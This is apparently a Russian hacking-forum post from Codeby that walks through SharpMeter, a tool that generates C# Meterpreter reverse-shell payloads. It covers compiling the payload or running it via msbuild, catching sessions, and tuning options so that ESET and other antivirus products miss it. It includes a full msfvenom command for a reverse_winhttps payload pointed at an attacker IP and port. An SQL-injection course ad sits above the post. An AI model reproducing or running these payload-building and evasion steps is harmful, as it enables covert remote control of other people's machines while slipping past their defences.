• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья [SharpMeter] - Генератор полезных нагрузок C-sharp

1027049815.jpg


И снова здравствуйте друзья)
Коротенький пост,посмотрим сегодня функционал программы SharpMeter которая позволяет нам создавать полезные нагрузки на языке C#. Написанная на питоне. Все тривиально просто. И так качнули с гитхаба. Запустили на виндоус машине,смотрим справку:
1.PNG

Поддерживает наш скрипт два режима генерации полезной нагрузки:
Путем ввода айпи и порта атакуещего + опции
Путем добавления хекс кода + опции

И так давайте сначала первый простой метод путем создания без либо каких опций:
2.PNG
3.PNG


Видите он как и мой скрипт создает список команд для метасплоита и команду компиляции через NET Framework.
Поднимем листенер,выполним команду для компиляции:
3.PNG
5.PNG
6.PNG

Запускаем - получаем сессию
9.PNG


Что касается детекта на АВ. Вот :
7.PNG

Из известных АВ детектится Есетом. Ну не FUD но тоже не плохо довольно) Если использовать с параметрами -w -x , то детект будет 7/41 но ЕСЕТ не будет палит и другие известные АВ также
Вот бинарника созданно с этими параметрами.
Дальше пробуем тоже самое только с дополнительными опциями:
10.PNG

Получили команду для msbuild.
Запускаем и прилетает сессия без компиляции в бинарный файл.
Ну и второй способ довольно интересный)))
Создаем полезную нагрузку через msfvenom сначала командой:
Код:
msfvenom -p windows/meterpreter/reverse_winhttps lhost=192.168.137.92 lport=1337 -f hex
11.PNG


Копипастим сроку в хексе в наш параметр для SharpMeter:
11-1.PNG


Запускаем команду msbuild - получаем сессию)

12.PNG

Все довольно просто и удобно
Всем спасибо)

 
Последнее редактирование:
S

Sniff

Он и На Линуксе запустился, щас потестируем.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!